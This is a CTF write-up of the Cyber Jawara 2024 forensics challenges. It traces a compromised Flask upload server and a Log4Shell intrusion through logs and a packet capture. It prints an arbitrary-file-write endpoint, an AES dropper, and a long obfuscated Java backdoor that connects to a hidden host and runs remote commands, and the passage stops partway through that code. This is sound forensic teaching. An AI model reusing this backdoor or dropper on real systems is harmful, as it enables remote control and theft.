Cyber Jawara 2024

Write-ups for all the Forensics challenges in Cyber Jawara 2024.

Whale

Desc: Someone broke into our application server. Could you help to investigate what they did?

In this challenge, we are provided with a server dump containing multiple folders.


First, I open the app folder, which contains a Dockerfile to build the server.

The Dockerfile shows that the image build uses curl to fetch two Pastebin links, the second of which is saved as app.py and run as the server. Knowing this, the next step is to check the logs generated while the Dockerfile was being executed.

FROM python:3-alpine

ENV PYTHONUNBUFFERED=1

WORKDIR /app

RUN apk add --no-cache \
    gcc \
    musl-dev \
    linux-headers \
    libffi-dev \
    openssl-dev \
    curl

RUN pip install --no-cache-dir Flask pycryptodome

ARG ID1
ARG ID2

RUN curl "https://pastebin.com/raw/YJqeFMMv"
RUN curl -o app.py "https://pastebin.com/raw/RaVtFnw9"

EXPOSE 5000

ENTRYPOINT ["python", "app.py"]

I checked all the folders containing logs and found the relevant log in /var/log/audit, which shows the execution details of the Dockerfile.

From that, we know the complete URLs of the two Pastebin links.

  • https://pastebin.com/raw/YJqeFMMv

Part 1: CJ{dae071f96aad

  • https://pastebin.com/raw/RaVtFnw9

from flask import Flask, request, jsonify
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import os

app = Flask(__name__)

@app.route('/upload', methods=['POST'])
def upload_file():
  # Get query parameters
  file_path = request.args.get('a')
  encryption_key = request.args.get('b')

  if not file_path:
    return jsonify({"error": "Query parameter 'a' is required for file path."}), 400

  try:
    # Get the Base64-encoded file content from the request body
    encoded_file = request.data.decode('utf-8')
    file_content = base64.b64decode(encoded_file)

    # If encryption key is provided, encrypt the file content
    if encryption_key:
      if len(encryption_key) not in (16, 24, 32):
        return jsonify({"error": "Encryption key must be 16, 24, or 32 bytes long."}), 400
      cipher = AES.new(encryption_key.encode('utf-8'), AES.MODE_ECB)
      file_content = cipher.encrypt(pad(file_content, AES.block_size))

    # Save the file
    os.makedirs(os.path.dirname(file_path), exist_ok=True)
    with open(file_path, 'wb') as f:
      f.write(file_content)

    return jsonify({"message": "File uploaded successfully."}), 200

  except base64.binascii.Error:
    return jsonify({"error": "Invalid Base64-encoded string."}), 400
  except Exception as e:
    return jsonify({"error": str(e)}), 500

if __name__ == '__main__':
  app.run(debug=True)

From those links, we obtain the first part of the flag, but it’s unclear how many parts the flag consists of in this challenge. We also obtained the code for app.py, which runs the server. It exposes one endpoint, /upload, which accepts POST requests and takes two query parameters: a, the path the file is written to, and b, an optional encryption key. The endpoint Base64-decodes the request body, encrypts it with AES in ECB mode when a key is provided, and saves the result to the given path. Now, let’s search the logs for the running server again.

We found the logs for the running server at var/lib/docker/containers/4e5f2fa4c43bba8c3123d068f2ec24e4399a860113d41cccbeb75c428cb04ebf/4e5f2fa4c43bba8c3123d068f2ec24e4399a860113d41cccbeb75c428cb04ebf-json.log

It contains:

{"log":" * Serving Flask app 'app'\n","stream":"stdout","time":"2025-01-09T06:24:09.897872504Z"}
{"log":" * Debug mode: on\n","stream":"stdout","time":"2025-01-09T06:24:09.898441023Z"}
{"log":"\u001b[31m\u001b[1mWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\u001b[0m\n","stream":"stderr","time":"2025-01-09T06:24:09.966796188Z"}
{"log":" * Running on all addresses (0.0.0.0)\n","stream":"stderr","time":"2025-01-09T06:24:09.966842827Z"}
{"log":" * Running on http://127.0.0.1:5000\n","stream":"stderr","time":"2025-01-09T06:24:09.966848468Z"}
{"log":" * Running on http://172.17.0.2:5000\n","stream":"stderr","time":"2025-01-09T06:24:09.966852626Z"}
{"log":"\u001b[33mPress CTRL+C to quit\u001b[0m\n","stream":"stderr","time":"2025-01-09T06:24:09.967351141Z"}
{"log":" * Restarting with stat\n","stream":"stderr","time":"2025-01-09T06:24:09.968766946Z"}
{"log":" * Debugger is active!\n","stream":"stderr","time":"2025-01-09T06:24:10.386381656Z"}
{"log":" * Debugger PIN: 673-288-487\n","stream":"stderr","time":"2025-01-09T06:24:10.387824912Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:24:36] \"\u001b[33mGET / HTTP/1.1\u001b[0m\" 404 -\n","stream":"stderr","time":"2025-01-09T06:24:36.26334873Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:25:31] \"\u001b[33mPOST /?a=/tmp/test HTTP/1.1\u001b[0m\" 404 -\n","stream":"stderr","time":"2025-01-09T06:25:31.852971084Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:25:41] \"POST /upload?a=/tmp/test HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:25:41.52350298Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:27:34] \"POST /upload?a=/tmp/what\u0026b=705f9dc63b9c3bfa HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:27:34.937305157Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:28:57] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:28:57.355517889Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:30:41] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:30:41.01378587Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:31:00] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:31:00.167349379Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:31:28] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:31:28.464410866Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:31:50] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:31:50.811240286Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:32:27] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:32:27.086314438Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:33:04] \"POST /upload?a=/tmp/what2\u0026b=705f9dc63b9c3bfa HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:33:04.811347946Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:36:22] \"POST /upload?a=/tmp/uploaded_file HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:36:22.331880092Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:38:47] \"POST /upload?a=/tmp/uploaded_file HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:38:47.720677553Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:40:02] \"POST /upload?a=/tmp/h3r3\u0026b=a2c31cd2a4c1bf6a HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:40:02.209540807Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:40:41] \"POST /upload?a=/tmp/n0\u0026b=a2c31cd2a4c1bf6a HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:40:41.390646324Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:40:57] \"POST /upload?a=/tmp/h3r3\u0026b=a2c31cd2a4c1bf6a HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:40:57.282394022Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:41:03] \"POST /upload?a=/tmp/n0\u0026b=a2c31cd2a4c1bf6a HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:41:03.313752062Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:42:50] \"POST /upload?a=/tmp/interesting HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:42:50.386944954Z"}

Seven suspicious files were uploaded using the endpoint, and four of them are encrypted. First, I opened each of the files that didn’t use an encryption key and found the second part of the flag in the /tmp/interesting file.

Part 2: fb8c2417ed67157
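
To pull the upload history out of the container log without reading it by eye, the following added example (not part of the original write-up) parses the json-file records shown above, strips the ANSI colour codes, and keeps the last successful write per path, since a path written several times only holds its final upload. The sample lines are a subset copied from the log above; the helper names are hypothetical.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs

# Subset of the json-file records shown above, copied from the page.
SAMPLE_LOG = r'''
{"log":"172.17.0.1 - - [09/Jan/2025 06:25:31] \"\u001b[33mPOST /?a=/tmp/test HTTP/1.1\u001b[0m\" 404 -\n","stream":"stderr","time":"2025-01-09T06:25:31.852971084Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:25:41] \"POST /upload?a=/tmp/test HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:25:41.52350298Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:28:57] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:28:57.355517889Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:32:27] \"POST /upload?a=/tmp/w00t\u0026b=64bc4dbca3c92adc HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:32:27.086314438Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:40:57] \"POST /upload?a=/tmp/h3r3\u0026b=a2c31cd2a4c1bf6a HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:40:57.282394022Z"}
{"log":"172.17.0.1 - - [09/Jan/2025 06:42:50] \"POST /upload?a=/tmp/interesting HTTP/1.1\" 200 -\n","stream":"stderr","time":"2025-01-09T06:42:50.386944954Z"}
'''

# Werkzeug colours non-2xx request lines, so ANSI codes must go before matching.
ANSI = re.compile(r'\x1b\[[0-9;]*m')
ACCESS = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def parse_uploads(text):
    """Return successful POST /upload requests in log order."""
    uploads = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            record = json.loads(raw)          # one JSON object per line
        except json.JSONDecodeError:
            continue                          # skip truncated or foreign lines
        line = ANSI.sub('', record.get('log', '')).strip()
        m = ACCESS.match(line)
        if not m or m['method'] != 'POST' or m['status'] != '200':
            continue
        url = urlsplit(m['target'])
        if url.path != '/upload':
            continue
        query = parse_qs(url.query)
        path = query.get('a', [None])[0]
        if path is None:
            continue
        uploads.append({
            'time': record.get('time'),
            'client': m['ip'],
            'path': path,
            'key': query.get('b', [None])[0],  # None means stored unencrypted
        })
    return uploads


def last_write_per_path(uploads):
    """Collapse repeated uploads: the file on disk reflects the last write."""
    state = {}
    for u in uploads:
        entry = state.setdefault(u['path'], {'writes': 0})
        entry['writes'] += 1
        entry['key'] = u['key']
        entry['last'] = u['time']
    return state


def triage(state):
    """Split paths into plaintext files and encrypted files with their key."""
    plaintext = [p for p, e in state.items() if e['key'] is None]
    encrypted = {p: e['key'] for p, e in state.items() if e['key'] is not None}
    return plaintext, encrypted


if __name__ == '__main__':
    plain, enc = triage(last_write_per_path(parse_uploads(SAMPLE_LOG)))
    print('read directly:', plain)
    print('decrypt with :', enc)
```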

Next, I saved all the encrypted files along with their corresponding keys and created a script to decrypt them.

import os
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

files_to_decrypt = {
    "h3r3": "a2c31cd2a4c1bf6a",
    "n0": "a2c31cd2a4c1bf6a",
    "w00t": "64bc4dbca3c92adc",
    "what": "705f9dc63b9c3bfa",
    "what2": "705f9dc63b9c3bfa"
}

def decrypt_file(file_path, encryption_key):
    try:
        if len(encryption_key) not in (16, 24, 32):
            raise ValueError("Encryption key must be 16, 24, or 32 bytes long.")
        
        with open(file_path, 'rb') as f:
            encrypted_content = f.read()
        
        cipher = AES.new(encryption_key.encode('utf-8'), AES.MODE_ECB)

        decrypted_content = unpad(cipher.decrypt(encrypted_content), AES.block_size)
        
        # Print the decrypted content as a string
        print(f"Decrypted content of {file_path}:")
        print(decrypted_content.decode('utf-8', errors='ignore'))

    except Exception as e:
        print(f"Error during decryption of {file_path}: {e}")

for file, key in files_to_decrypt.items():
    if os.path.exists(file):
        decrypt_file(file, key)
    else:
        print(f"File not found: {file}")

And here is the result.

$ python decrypt.py   
Decrypted content of h3r3:
Part 3: 11cb9e36e6c1e}
Decrypted content of n0:
Not this
Decrypted content of w00t:

Error during decryption of what: Data must be aligned to block boundary in ECB mode
Decrypted content of what2:

FLAG: CJ{dae071f96aadfb8c2417ed6715711cb9e36e6c1e}

Log4Shell 1

Desc: Our application is still using vulnerable Log4j and someone just hacked us! Please help to investigate and find out what they did.

We have been provided with a PCAP file containing captured network traffic from the client’s application. Let’s open it up using Wireshark.

Based on the title of the challenge, it presents the aftermath of a Log4Shell (CVE-2021-44228) exploit. At first, for an hour or more, I was confused by the LDAP link. But later I set it aside for a moment and looked at the other packets. There are 3779 packets in this capture. Following the TCP stream, I luckily found some interesting things. After each HTTP request, the response leaks one character for the requested endpoint.

After each HTTP request with the GET method, there is a response, and each response leaks one character.

The value of FLAGPART1 is determined to be C, and this pattern continues sequentially until FLAGPART34. Together, these variables combine to form the complete flag.

FLAG: CJ{c4n_y0u_c0ntinu3_unt1l_Flag_2}

Log4Shell 2

Desc: Our application is still using vulnerable Log4j and someone just hacked us! Please help to investigate and find out what they did. Note: There are two flags in this challenge (which means Log4Shell 2 is a continuation of part 1)

With the same attachment and description as Log4Shell 1, we continue our exploration to find Flag 2. After the flag characters are leaked, there is another file in an HTTP GET request, Dropper.class. Using this decompiler, I got the original Dropper.java and analyzed it.

import java.io.FileOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;

public class Dropper {
   private static final String ALGORITHM = "AES";
   private static final String TRANSFORMATION = "AES/ECB/PKCS5Padding";

   private static String getSecretKey() throws Exception {
      Class var0 = Class.forName("java.lang.System");
      Method var1 = var0.getMethod("getenv", String.class);
      String var2 = "";

      for(int var3 = 1; var3 <= 16; ++var3) {
         var2 = var2 + (String)var1.invoke((Object)null, "FLAGPART" + var3);
      }

      return var2;
   }

   public static void decryptToFile(String var0, String var1) throws Exception {
      String var2 = getSecretKey();
      Class var3 = Class.forName("java.util.Base64");
      Method var4 = var3.getMethod("getDecoder");
      Object var5 = var4.invoke((Object)null);
      Method var6 = var5.getClass().getMethod("decode", String.class);
      byte[] var7 = (byte[])((byte[])var6.invoke(var5, var0));
      Class var8 = Class.forName("javax.crypto.spec.SecretKeySpec");
      Constructor var9 = var8.getConstructor(byte[].class, String.class);
      Object var10 = var9.newInstance(var2.getBytes(), "AES");
      Class var11 = Class.forName("javax.crypto.Cipher");
      Method var12 = var11.getMethod("getInstance", String.class);
      Object var13 = var12.invoke((Object)null, "AES/ECB/PKCS5Padding");
      Method var14 = var11.getMethod("init", Integer.TYPE, Class.forName("java.security.Key"));
      Method var15 = var11.getMethod("doFinal", byte[].class);
      var14.invoke(var13, 2, var10);
      byte[] var16 = (byte[])((byte[])var15.invoke(var13, var7));
      FileOutputStream var17 = new FileOutputStream(var1);
      Throwable var18 = null;

      try {
         var17.write(var16);
      } catch (Throwable var27) {
         var18 = var27;
         throw var27;
      } finally {
         if (var17 != null) {
            if (var18 != null) {
               try {
                  var17.close();
               } catch (Throwable var26) {
                  var18.addSuppressed(var26);
               }
            } else {
               var17.close();
            }
         }

      }

   }

   static {
      try {
         String var0 = "...";  // Base64-encoded ciphertext (long string elided)
         String var1 = "/tmp/Comms.class";
         decryptToFile(var0, var1);
      } catch (Exception var2) {
         var2.printStackTrace();
      }

   }
}

This code is designed to decrypt the var0 Base64 data, producing Comms.class as the output. It uses the AES encryption method in ECB mode, with the key derived from FLAGPART1 to FLAGPART16, which forms the key CJ{c4n_y0u_c0nti. By using tools like CyberChef, we can decode and decrypt var0 to retrieve Comms.class.

Using the decompiler again, we can get Comms.java.

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.lang.reflect.Method;
import java.net.Socket;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Arrays;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class Comms {
   // $FF: synthetic field
   private static final String[] I;
   // $FF: synthetic field
   private static final String XXX;
   // $FF: synthetic field
   private static final String YYY;
   // $FF: synthetic field
   private static final int[] l;

   private static void IIl() {
      l = new int[32];
      l[0] = (21 + 181 - 65 + 113 ^ 46 + 154 - 161 + 126) & (151 ^ 185 ^ 77 ^ 60 ^ -" ".length());
      l[1] = "  ".length();
      l[2] = " ".length();
      l[3] = "   ".length();
      l[4] = 85 ^ 49 ^ 163 ^ 195;
      l[5] = 127 ^ 122;
      l[6] = 104 ^ 110;
      l[7] = 87 + 12 - -35 + 36 ^ 83 + 116 - 132 + 106;
      l[8] = 24 ^ 16;
      l[9] = 182 + 39 - 48 + 11 ^ 50 + 91 - 39 + 75;
      l[10] = 19 ^ 65 ^ 1 ^ 89;
      l[11] = 92 ^ 87;
      l[12] = 50 ^ 62;
      l[13] = 71 ^ 74;
      l[14] = 27 ^ 21;
      l[15] = 146 ^ 157;
      l[16] = 161 ^ 174 ^ 144 ^ 143;
      l[17] = 141 ^ 156;
      l[18] = 73 ^ 91;
      l[19] = 95 ^ 99 ^ 187 ^ 148;
      l[20] = 124 ^ 104;
      l[21] = 203 ^ 192 ^ 189 ^ 163;
      l[22] = 1 ^ 104 ^ 108 + 36 - 21 + 4;
      l[23] = 47 ^ 24 ^ 137 ^ 169;
      l[24] = 120 ^ 117 ^ 13 ^ 24;
      l[25] = 59 + 50 - 57 + 83 ^ 3 + 96 - -11 + 48;
      l[26] = 142 + 117 - 184 + 113 ^ 153 + 63 - 187 + 137;
      l[27] = -8257 & 9593;
      l[28] = 26 ^ 1;
      l[29] = 105 ^ 96 ^ 39 ^ 50;
      l[30] = 41 ^ 52;
      l[31] = 135 + 73 - 150 + 88 ^ 21 + 88 - 1 + 32;
   }

   private static void ll() {
      I = new String[l[31]];
      I[l[0]] = I("eBq0gvhn60zfo1MunQjxEq+VgKjg5XsIv3e9pz85TDc=", "nErxg");
      I[l[2]] = l("XnpOLQlfekJ7XFwhTC8NXQ==", "nCzKk");
      I[l[1]] = I("7Ep1Z+Gia+U=", "UWraX");
      I[l[3]] = l("GxQcABJfFhgYGgUaRCIDAR0PEw==", "qujaj");
      I[l[4]] = l("AjwsJhwWLTkBEQA=", "eYXor");
      I[l[5]] = l("Ewc5RxARAEU4HhERXzg0NiYDBjI=", "RBjhU");
      I[l[6]] = l("Lx8HDA==", "FqnxZ");
      I[l[7]] = I("GHxTbaCWgquBBBSGerx+TiFBtURhB40u", "KcZiK");
      I[l[8]] = Il("Cf4KGA89+bA=", "uMCDA");
      I[l[9]] = Il("o1OzBtlndQ+3+IyNY+3z+HrXBauLHpzj", "OaiGN");
      I[l[10]] = Il("R5lwGFYcS7eccTUFCOhdLg==", "KunRL");
      I[l[11]] = l("ERwyKBERJj4UAQYbPyA=", "trQGu");
      I[l[12]] = Il("2/vFTel4NG6ys7fiFcHEt0wZOsC1vJqXP5GHiA7T9jE=", "dhvCA");
      I[l[13]] = l("fV1yEhJ8XX5ER38GcBAWfg==", "MdFtp");
      I[l[14]] = l("AwoL", "BOXvi");
      I[l[15]] = Il("kqsvxVHphdfXglIktDCFoHPv2dha64mD", "YbUwj");
      I[l[16]] = l("Lg8VPC86HgAbIiw=", "IjauA");
      I[l[17]] = Il("vLru125xRYdTLHj1VD9qtUsvKbrijfbX", "RqduM");
      I[l[18]] = Il("xRwDzYljVIU=", "fScWC");
      I[l[19]] = l("EAkMJl8JDRkyAxMcA2k6HxE=", "zhzGq");
      I[l[20]] = l("LyQVKDwqJw==", "KKSAR");
      I[l[21]] = l("CwkvD2gUHDACaCMJKgtwVQ==", "ahYnF");
      I[l[22]] = Il("uIHhwTaeAscF3EzVgdL4zg==", "tMxGZ");
      I[l[23]] = l("ChYmChAL", "nsEet");
      I[l[24]] = l("al9YAjJrX1RUZ2gEWgA2aQ==", "ZfldP");
      I[l[25]] = l("JygSTjMlL24xPSU+dDEXAgkoDxE=", "fmAav");
      I[l[26]] = I("EvA8rhxJMXPTCc0Wno5a9Q==", "QvZtB");
      I[l[28]] = l("OTAxITtw", "zxtbp");
      I[l[29]] = Il("gT9cJw1pjVI=", "eTlqI");
      I[l[30]] = I("BAW3Glpb798=", "pExyG");
   }

   private static boolean lll(int var0, int var1) {
      return var0 < var1;
   }

   static {
      IIl();
      ll();
      XXX = I[l[24]];
      YYY = I[l[25]];

      try {
         Socket llIlllIllllllll = new Socket(I[l[26]], l[27]);

         try {
            BufferedReader IlIlllIllllllll = new BufferedReader(new InputStreamReader(llIlllIllllllll.getInputStream()));

            try {
               BufferedWriter lIIlllIllllllll = new BufferedWriter(new OutputStreamWriter(llIlllIllllllll.getOutputStream()));

               try {
                  do {
                     lIIlllIllllllll.write(I[l[28]]);
                     lIIlllIllllllll.flush();
                     boolean IIIlllIllllllll = IlIlllIllllllll.readLine();
                     if (lIl(IIIlllIllllllll) && Ill(IIIlllIllllllll.isEmpty())) {
                        Exception lllIllIllllllll = decrypt(IIIlllIllllllll);
                        double IllIllIllllllll = Runtime.getRuntime().exec(lllIllIllllllll);
                        int lIlIllIllllllll = new BufferedReader(new InputStreamReader(IllIllIllllllll.getInputStream()));
                        StringBuilder IIlIllIllllllll = new StringBuilder();

                        String llIIllIllllllll;
                        while(lIl(llIIllIllllllll = lIlIllIllllllll.readLine())) {
                           IIlIllIllllllll.append(llIIllIllllllll).append(I[l[29]]);
                           "".length();
                           "".length();
                           if (-"   ".length() >= 0) {
                              return;
                           }
                        }

                        boolean IlIIllIllllllll = encrypt(String.valueOf(IIlIllIllllllll));
                        lIIlllIllllllll.write(String.valueOf((new StringBuilder()).append(IlIIllIllllllll).append(I[l[30]])));
                        lIIlllIllllllll.flush();
                     }

                     Thread.sleep(5000L);
                     "".length();
                  } while((107 ^ 111) >= "   ".length());

               } catch (Throwable var13) {
                  label61: {
                     try {
                        lIIlllIllllllll.close();
                     } catch (Throwable var12) {
                        var13.addSuppressed(var12);
                        break label61;
                     }

                     "".length();
                     if ("  ".length() < 0) {
                        return;
                     }
                  }

                  throw var13;
               }
            } catch (Throwable var14) {
               label56: {
                  try {
                     IlIlllIllllllll.close();
                  } catch (Throwable var11) {
                     var14.addSuppressed(var11);
                     break label56;
                  }

                  "".length();
                  if (((4 + 93 - 74 + 114 ^ 54 + 50 - -65 + 28) & (101 ^ 120 ^ 60 ^ 109 ^ -" ".length())) < 0) {
                     return;
                  }
               }

               throw var14;
            }
         } catch (Throwable var15) {
            label51: {
               try {
                  llIlllIllllllll.close();
               } catch (Throwable var10) {
                  var15.addSuppressed(var10);
                  break label51;
               }

               "".length();
               if ("  ".length() != "  ".length()) {
                  return;
               }
            }

            throw var15;
         }
      } catch (Exception var16) {
         var16.printStackTrace();
      }
   }

   private static String encrypt(String llllIllllllllll) throws Exception {
      byte IlllIllllllllll = Class.forName(I[l[0]]);
      Class[] var10001 = new Class[l[1]];
      var10001[l[0]] = byte[].class;
      var10001[l[2]] = String.class;
      short lIllIllllllllll = IlllIllllllllll.getConstructor(var10001);
      Object[] var14 = new Object[l[1]];
      var14[l[0]] = I[l[2]].getBytes();
      var14[l[2]] = I[l[1]];
      long IIllIllllllllll = lIllIllllllllll.newInstance(var14);
      int llIlIllllllllll = Class.forName(I[l[3]]);
      String var15 = I[l[4]];
      Class[] var10002 = new Class[l[2]];
      var10002[l[0]] = String.class;
      double IlIlIllllllllll = llIlIllllllllll.getMethod(var15, var10002);
      Object[] var16 = new Object[l[2]];
      var16[l[0]] = I[l[5]];
      double lIIlIllllllllll = IlIlIllllllllll.invoke((Object)null, var16);
      var15 = I[l[6]];
      var10002 = new Class[l[1]];
      var10002[l[0]] = Integer.TYPE;
      var10002[l[2]] = Class.forName(I[l[7]]);
      byte IIIlIllllllllll = llIlIllllllllll.getMethod(var15, var10002);
      var16 = new Object[l[1]];
      var16[l[0]] = l[2];
      var16[l[2]] = IIllIllllllllll;
      IIIlIllllllllll.invoke(lIIlIllllllllll, var16);
      "".length();
      var15 = I[l[8]];
      var10002 = new Class[l[2]];
      var10002[l[0]] = byte[].class;
      char lllIIllllllllll = llIlIllllllllll.getMethod(var15, var10002);
      var16 = new Object[l[2]];
      var16[l[0]] = llllIllllllllll.getBytes();
      int IllIIllllllllll = (byte[])lllIIllllllllll.invoke(lIIlIllllllllll, var16);
      Exception lIlIIllllllllll = Class.forName(I[l[9]]);
      double IIlIIllllllllll = lIlIIllllllllll.getMethod(I[l[10]]);
      double llIIIllllllllll = IIlIIllllllllll.invoke((Object)null);
      Class var10000 = llIIIllllllllll.getClass();
      var15 = I[l[11]];
      var10002 = new Class[l[2]];
      var10002[l[0]] = byte[].class;
      Method IlIIIllllllllll = var10000.getMethod(var15, var10002);
      var16 = new Object[l[2]];
      var16[l[0]] = IllIIllllllllll;
      return (String)IlIIIllllllllll.invoke(llIIIllllllllll, var16);
   }

   private static String I(String IIIlIlIllllllll, String lllIIlIllllllll) {
      try {
         SecretKeySpec lIllIlIllllllll = new SecretKeySpec(MessageDigest.getInstance("MD5").digest(lllIIlIllllllll.getBytes(StandardCharsets.UTF_8)), "Blowfish");
         Cipher IIllIlIllllllll = Cipher.getInstance("Blowfish");
         IIllIlIllllllll.init(l[1], lIllIlIllllllll);
         return new String(IIllIlIllllllll.doFinal(Base64.getDecoder().decode(IIIlIlIllllllll.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
      } catch (Exception var4) {
         var4.printStackTrace();
         return null;
      }
   }

   private static String Il(String llIllIIllllllll, String IIlllIIllllllll) {
      try {
         byte lIIllIIllllllll = new SecretKeySpec(Arrays.copyOf(MessageDigest.getInstance("MD5").digest(IIlllIIllllllll.getBytes(StandardCharsets.UTF_8)), l[8]), "DES");
         Exception IIIllIIllllllll = Cipher.getInstance("DES");
         IIIllIIllllllll.init(l[1], lIIllIIllllllll);
         return new String(IIIllIIllllllll.doFinal(Base64.getDecoder().decode(llIllIIllllllll.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
      } catch (Exception var4) {
         var4.printStackTrace();
         return null;
      }
   }

   private static String l(String lIllIIIllllllll, String lllIIIIllllllll) {
      lIllIIIllllllll = new String(Base64.getDecoder().decode(lIllIIIllllllll.getBytes(StandardCharsets.UTF_8)), StandardCharsets.UTF_8);
      byte IllIIIIllllllll = new StringBuilder();
      short lIlIIIIllllllll = lllIIIIllllllll.toCharArray();
      int lIIlIIIllllllll = l[0];
      boolean llIIIIIllllllll = lIllIIIllllllll.toCharArray();
      boolean IlIIIIIllllllll = llIIIIIllllllll.length;
      int lIIIIIIllllllll = l[0];

      do {
         if (!lll(lIIIIIIllllllll, IlIIIIIllllllll)) {
            return String.valueOf(IllIIIIllllllll);
         }

         char IlllIIIllllllll = llIIIIIllllllll[lIIIIIIllllllll];
         IllIIIIllllllll.append((char)(IlllIIIllllllll ^ lIlIIIIllllllll[lIIlIIIllllllll % lIlIIIIllllllll.length]));
         "".length();
         ++lIIlIIIllllllll;
         ++lIIIIIIllllllll;
         "".length();
      } while((188 ^ 184) >= "  ".length());

      return null;
   }

   private static boolean Ill(int var0) {
      return var0 == 0;
   }

   private static String decrypt(String llIIlIlllllllll) throws Exception {
      double IlIIlIlllllllll = Class.forName(I[l[12]]);
      Class[] var10001 = new Class[l[1]];
      var10001[l[0]] = byte[].class;
      var10001[l[2]] = String.class;
      String lIIIlIlllllllll = IlIIlIlllllllll.getConstructor(var10001);
      Object[] var15 = new Object[l[1]];
      var15[l[0]] = I[l[13]].getBytes();
      var15[l[2]] = I[l[14]];
      String IIIIlIlllllllll = lIIIlIlllllllll.newInstance(var15);
      long llllIIlllllllll = Class.forName(I[l[15]]);
      String var16 = I[l[16]];
      Class[] var10002 = new Class[l[2]];
      var10002[l[0]] = String.class;
      double IlllIIlllllllll = llllIIlllllllll.getMethod(var16, var10002);
      Object[] var17 = new Object[l[2]];
      var17[l[0]] = I[l[17]];
      byte lIllIIlllllllll = IlllIIlllllllll.invoke((Object)null, var17);
      var16 = I[l[18]];
      var10002 = new Class[l[1]];
      var10002[l[0]] = Integer.TYPE;
      var10002[l[2]] = Class.forName(I[l[19]]);
      short IIllIIlllllllll = llllIIlllllllll.getMethod(var16, var10002);
      var17 = new Object[l[1]];
      var17[l[0]] = l[1];
      var17[l[2]] = IIIIlIlllllllll;
      IIllIIlllllllll.invoke(lIllIIlllllllll, var17);
      "".length();
      var16 = I[l[20]];
      var10002 = new Class[l[2]];
      var10002[l[0]] = byte[].class;
      byte llIlIIlllllllll = llllIIlllllllll.getMethod(var16, var10002);
      float IlIlIIlllllllll = Class.forName(I[l[21]]);
      byte lIIlIIlllllllll = IlIlIIlllllllll.getMethod(I[l[22]]);
      String IIIlIIlllllllll = lIIlIIlllllllll.invoke((Object)null);
      Class var10000 = IIIlIIlllllllll.getClass();
      var16 = I[l[23]];
      var10002 = new Class[l[2]];
      var10002[l[0]] = String.class;
      double lllIIIlllllllll = var10000.getMethod(var16, var10002);
      var17 = new Object[l[2]];
      var17[l[0]] = llIIlIlllllllll;
      byte[] IllIIIlllllllll = (byte[])lllIIIlllllllll.invoke(IIIlIIlllllllll, var17);
      Object[] var10004 = new Object[l[2]];
      var10004[l[0]] = IllIIIlllllllll;
      return new String((byte[])llIlIIlllllllll.invoke(lIllIIlllllllll, var10004));
   }

   private static boolean lIl(Object var0) {
